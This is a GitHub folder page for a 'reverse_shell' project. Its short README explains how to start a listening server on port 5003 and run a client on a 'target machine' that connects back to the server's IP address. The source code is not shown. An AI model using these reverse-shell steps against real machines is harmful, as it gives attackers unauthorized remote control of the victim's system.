Skip to content

Latest commit

 

History

History
 
 

reverse_shell

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 

You don't need to install anything.

  • To run the server, simply write:
    python server.py
    
    Output:
    Listening as 0.0.0.0:5003 ...
    
  • Running the client (target machine) that connects to 192.168.1.104 (server's IP Address) :
    python client.py 192.168.1.104
    
  • The server will get notified once a client is connected.